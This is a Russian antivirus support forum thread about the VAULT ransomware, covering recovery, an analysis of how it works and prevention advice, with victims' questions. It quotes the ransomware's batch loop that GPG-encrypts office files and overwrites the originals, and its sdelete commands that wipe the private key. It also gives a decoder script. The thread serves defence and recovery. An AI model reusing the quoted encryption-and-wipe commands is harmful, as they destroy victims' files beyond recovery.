VAULT. что делать? - Форум технической поддержки ESET NOD32

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 01.04.2015 12:24:54

Если вам необходимо восстановить документы зашифрованные VAULT, выполните следующие действия:

1. проверьте наличие теневых копий на дисках, если есть чистые теневые копии, восстановить документы можно без расшифровки.
Используйте для работы с теневыми копиями ShadowExplorer

если теневые копии отсутствуют, возможно были отключены шифратором, восстановите (на будущее) через настройки защиты дисков резервирование
пространства в 5-10% под теневые копии.

2. если теневые и архивные копии отсутствуют, вы можете попытаться самостоятельно выполнить расшифровку документов.
для этого необходимо найти файл secring.gpg.
secring.gpg(sec key) здесь нужен не любой, не найденный по дороге домой из сетевого форума, а созданный на вашей машине (как правило в %TEMP%
юзера) в момент запуска процесса шифрования. Хотя вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает
данный ключ с помощью утилиты sdelete.exe.

Цитата
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg" "%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\vaultkey.vlt" "%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\confclean.list"

Повторный запуск шифратора с целью получения этого ключа не поможет. ключ будет создан уже с другим отпечатком и ID, и для расшифровки ваших документов
не подойдет. пробуйте искать данный ключ среди удаленных файлов, но обязательно ненулевого размера. ~1Кб.

что делает шифратор с исходными файлами:

Код
dir /B "%1:\"&& for /r "%1:\" %%i in (.xls .doc) do ( echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst" echo %%i>> "%temp%\conf.list" )

Код

dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
echo %%i>> "%temp%\conf.list"
)

после шифрования к примеру файла 1.doc рядом с ним создается зашифрованный файл 1.doc.gpg, затем зашифрованный 1.doc.gpg перемещается на место исходного_чистого с новым именем 1.doc,
и только затем переименовывается в 1.doc.vault.
т.о. исходный файл не удаляется, а перезаписывается зашифрованным документом с целью невозможности его восстановления.
-------
Добавим, что злоумышленники после завершения шифрования оставляют на диске файлы VAULT.KEY и CONFIRMATION.KEY. Первый содержит экспортированный secring.gpg,
но зашифрованный с помощью pub key злоумышленников, поэтому расшифровать его на нашей стороне невозможно.
В CONFIRMATION.KEY содержится полный список зашифрованных файлов. Оба эти файла оставлены на диске в качестве жеста "доброй, но и злой" воли
с целью "протянуть руку товарищеской, но платной помощи" пострадавшему юзеру.
--------
если sec key найден, вы можете установить GnuPG и GPGShell и проверить возможность расшифровки.

скачайте отсюда и установите GnuPG
+
отсюда можно скачать GPGShell

В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами.
+
После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG.
-----------

как можно избежать встречи с VAULT?
1. будьте предельно внимательны при работе с почтой.
если вложенный в сообщение или добавленный по ссылке архив содержит исполняемые файлы *.exe, *.com, *.pif, *.js, *.cmd, *.scr, *.bat, то такой документ никак не может быть офисным документом.
Значит вас вводят в заблуждение, выдавая черное за белое.
2. настройте самостоятельно или попросите админа настроить политики ограниченного запуска исполняемых программ из вложенных архивов.
например:

Цитата
%userprofile%\Local Settings\Temp\_tc\.js %userprofile%\Appdata\Local\Temp\_tc\.js

3. Пробуйте с помощью HIPS запретить запись в файл %TEMP%\pubring.gpg.
в любом случае, в данной модификации энкодера (если он использует GnuPG) после скачивания и запуска утилита gpg.exe (которая может быть переименована и упакована как угодно) вначале будет создавать ключевую
пару pubring.gpg/secring.gpg, а затем уже - шифровать ваши данные с помощью созданных ключей.

4. Если предварительно положить (и защитить от изменения) известный вам ключ pubring.gpg, то в этом случае
шифрование состоится, но известным ключом. Или не состоится.

(с), chklst.ru

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 08.04.2015 10:17:47

убрали утилитку sdelete.exe
добавили шифрование удаленных файлов средствами самой системы.
с помощью системной программы cipher.exe

Цитата
Cipher.exe является инструментом командной строки (входит в Windows 2000), которые можно использовать для управления зашифрованных данных с помощью шифрованной файловой системы (EFS). По состоянию на июнь 2001 года, Microsoft разработал усовершенствованную версию инструмента Cipher.exe, что обеспечивает возможность постоянно переписывать (или "стереть" все удаленные данные на жестком диске. Эта функция повышает безопасность, гарантируя, что даже злоумышленник, который получил полный физический контроль над компьютером для Windows 2000 не сможет восстановить ранее удаленные данные.

Цитата

Cipher.exe является инструментом командной строки (входит в Windows 2000), которые можно использовать для управления зашифрованных данных с помощью шифрованной файловой системы (EFS). По состоянию на июнь 2001 года, Microsoft разработал усовершенствованную версию инструмента Cipher.exe, что обеспечивает возможность постоянно переписывать (или "стереть" все удаленные данные на жестком диске. Эта функция повышает безопасность, гарантируя, что даже злоумышленник, который получил полный физический контроль над компьютером для Windows 2000 не сможет восстановить ранее удаленные данные.

https://www.virustotal.com/ru/file/b948633b6f3e1a04959cf174beb6116726b951c7a76ccdc171151f157d45a69e/.../1428505266/

раскодировал файл svchost.exe из js шифратора

Цитата
gpg (GnuPG) 1.4.18 Copyright © 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Home: ***** Поддерживаются следующие алгоритмы: С открытым ключом: RSA, RSA-E, RSA-S, ELG-E, DSA Симметричные шифры: IDEA, 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH, CAMELLIA128, CAMELLIA192, CAMELLIA256 Хэш-функции: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224 Алгоритмы сжатия: Без сжатия, ZIP, ZLIB, BZIP2

Цитата

gpg (GnuPG) 1.4.18
Copyright © 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Home: *****
Поддерживаются следующие алгоритмы:
С открытым ключом: RSA, RSA-E, RSA-S, ELG-E, DSA
Симметричные шифры: IDEA, 3DES, CAST5, BLOWFISH, AES, AES192, AES256,
TWOFISH, CAMELLIA128, CAMELLIA192, CAMELLIA256
Хэш-функции: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Алгоритмы сжатия: Без сжатия, ZIP, ZLIB, BZIP2

Изменено: santy - 08.04.2015 19:08:14

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 24.04.2015 11:33:36

примерный исходник декодера для VAULT
в текущий каталог скопируйте файлы
gpg.exe, iconv.dll из каталога с GnuPG
добавьте в текущий каталог ваш секретный ключ
(в тексте программы он показан как uncrypt.key)

Код
@ECHO OFF attrib -s -h -r UNCRYPT.KEY if not exist UNCRYPT.KEY (echo UNCRYPT.KEY NOT EXIST - press any key&pause&goto eof) gpg.exe --import UNCRYPT.KEY FOR %%f IN (C D E F G ) DO call :decode %%f goto eof :decode dir /B "%1:\"&& for /r "%1:\" %%i in (.vault) do ( RENAME "%%~fi" "%%~ni.gpg" & gpg.exe --batch --no-verbose -q --decrypt-files "%%~pi%%~ni.gpg" & del /f /q "%%~pi%%~ni.gpg" ) dir /B "%1:\"&& for /r "%1:\" %%i in (.gpg) do ( gpg.exe --batch --no-verbose -q --decrypt-files "%%~fi" & del /f /q "%%~fi" ) :eof ECHO. ECHO FINISHED!

Код

@ECHO OFF
attrib -s -h -r UNCRYPT.KEY
if not exist UNCRYPT.KEY (echo UNCRYPT.KEY NOT EXIST - press any key&pause&goto eof)
gpg.exe --import UNCRYPT.KEY

FOR %%f IN (C D E F G ) DO call :decode %%f
goto eof
:decode
dir /B "%1:\"&& for /r "%1:\" %%i in (*.vault) do (
RENAME "%%~fi" "%%~ni.gpg" & gpg.exe --batch --no-verbose -q --decrypt-files "%%~pi%%~ni.gpg" & del /f /q "%%~pi%%~ni.gpg"
)

dir /B "%1:\"&& for /r "%1:\" %%i in (*.gpg) do (
gpg.exe --batch --no-verbose -q --decrypt-files "%%~fi" & del /f /q "%%~fi"
)

:eof
ECHO.
ECHO FINISHED!

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 27.04.2015 07:05:28

первый ключ VaultCrypt злоумышленников
gpg: зашифровано 1024-битным ключом RSA с ID 996E88A8, созданным 25.01.2015
"VaultCrypt (VaultCrypt) <BM-NBJaxrt4riuVrCq5NVcLrFC5CYCYkxpm@Bitmessage>"
gpg: сбой расшифровки: закрытый ключ не найден

File: X:\active\shifr\bat.encoder.vault\38\abraun\VAULT (c рабочего стола).KEY
Time: 27.04.2015 10:13:51 (27.04.2015 4:13:51 UTC)

----------
второй ключ злоумышленников появился

VaultCrypt
956D C11A 4A5D 3AA5 2E8D 0483 1DAE 0B11 81A3 F5F1
0x1DAE0B1181A3F5F1
ID ключа: 0x81A3F5F1
дата создания: 21.04.2015

Цитата
-----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1 - GPGshell v3.78 mI0EVTXwewEEALwrwle1wOckuOpuI2gWVONqBV1v4b3N0yvjSfkvGwdOKaU7w7hF K3H+2k2NbbucryAxkBYl6At921lyPg//gCXNpTC3iv4KvrFFtElDLpACrXj1O2oC ECS0an9H3D2TSPEZ0VyvTUHj6AlYD83yibdCaPfL0L+emsK3C21sANOTABEBAAG0 ClZhdWx0Q3J5cHSIuAQTAQIAIgUCVTXwewIbLwYLCQgHAwIGFQgCCQoLBBYCAwEC HgECF4AACgkQHa4LEYGj9fEZ1wP/d4B4Q3MOEkZxUyPkLhgG42uNKLYzUTPbkh0m /U9OEDsp0yKWQqQtC3K7sf2xduzgx6ysOfT6eXhPo7HdBCYi1R1eBgzcWgQwE5MM L4X40OMcPjvAWQFzX+qgiu1yulRSAepiKW6jSe8GRzdIj63SCmz7OipKSkW7Kk1j NrwjZJg= =gKhC -----END PGP PUBLIC KEY BLOCK-----

Цитата

gpg: зашифровано 1024-битным ключом RSA с ID 81A3F5F1, созданным 21.04.2015
"VaultCrypt"
gpg: сбой расшифровки: закрытый ключ не найден

File: X:\active\shifr\bat.encoder.vault\46\doc_vault_2015_04_22\doc\DATA\5\VAULT.KEY
Time: 27.04.2015 10:06:05 (27.04.2015 4:06:05 UTC)

Изменено: santy - 27.04.2015 07:16:03

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 27.04.2015 09:47:54

текущие варианты защиты от шифратора VAULT (помимо резервного копирования):
1. локальные политики.
запрет на запуск исполняемых файлов
*.doc.js
*.doc*.js
*.xls.js
*.xls*.js
2. запретить перезапись, удаление файлов pubring.gpg в %TEMP% юзера

Прикрепленные файлы

Cellar.rar (1.43 КБ)

Изменено: santy - 27.04.2015 10:04:17

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 27.04.2015 12:36:43

похоже теперь и свои приватные ключи будут менять регулярно

Код
gpg: ключ D6B5E4AA: импортирован открытый ключ "VaultCrypt" gpg: Всего обработано: 1 gpg: импортировано: 1 - Public keyring updated. - File: X:\active\shifr\bat.encoder.vault\47\doc.vault_20150427.1\doc\data\1\a1bb100b.ddb6e814 Time: 27.04.2015 15:33:52 (27.04.2015 9:33:52 UTC)

Код

gpg: ключ D6B5E4AA: импортирован открытый ключ "VaultCrypt"
gpg: Всего обработано: 1
gpg:                 импортировано: 1

- Public keyring updated. -

File: X:\active\shifr\bat.encoder.vault\47\doc.vault_20150427.1\doc\data\1\a1bb100b.ddb6e814
Time: 27.04.2015 15:33:52 (27.04.2015 9:33:52 UTC)

[ Как создать образ автозапуска? ]

Сообщений: 1

Регистрация: 20.08.2015

Размещено 20.08.2015 12:02:47

Отправила моя сотрудница мне письмо - Саша, у меня акты не открывается.
У меня открылось.
У нее тоже открывалось, но ругалось как оказалось.
У меня NOD выругался, но не убил сразу.
почти все doc, xls, jpeg, pdf и zip повалило в VAULT
NOD выругался дважды - 17 и 18.08

Все что нашел - удалил
secring.gpg. пустой

в C\Documents and Settings\Sasha\Application Data лежат CONFIRMATION.KEY (17.08) и VAULT.KEY (18.08)
в C:\Documents and Settings\Sasha\Local Settings лежат : 4077430c_VAULT.KEY (17.08) и
VAULT.KEY (18.08)

борьба возможна?

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 20.08.2015 12:24:37

Александр,
здесь все подробно изложено. что делать.
http://chklst.ru/forum/discussion/1481/vault-chto-delat

если документы зашифрованы, если копий документов нет, если теневые копии не поддерживаются, если secring.gpg нулевой,
то придется или прощаться (и по новой создавать) с рабочими документами, или с энной суммой денег, которые злоумышленники просят у вас за расшифровку своего безобразия.

и провести учения среди персонала на предмет: какие документы из писем можно безопасно открывать, а какие нельзя открывать и удалять сразу в корзину.

Изменено: santy - 20.08.2015 12:38:53

[ Как создать образ автозапуска? ]

Сообщений: 1

Регистрация: 21.08.2015

Размещено 21.08.2015 09:10:02

Здравствуйте. Получили письмо "счастья". Зашифровано 21 000 файлов.
Имем :
VAULT.KEY
pubring.gpg

Как я понимаю последний - это открытый ключ. Можно ли на основе двух файлов сделать SEC.KEY?

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 21.08.2015 09:49:02

Александр,
для расшифровки своими силами этих файлов недостаточно. нужен ваш secring.gpg
http://chklst.ru/forum/discussion/1481/vault-chto-delat

для расшифровки документов с помощью мошенников (и за деньги), этого достаточно, поскольку у них есть секретный ключ к VAULT.key

[ Как создать образ автозапуска? ]

[ Закрыто ] VAULT. что делать? , bat encoder / CryptVault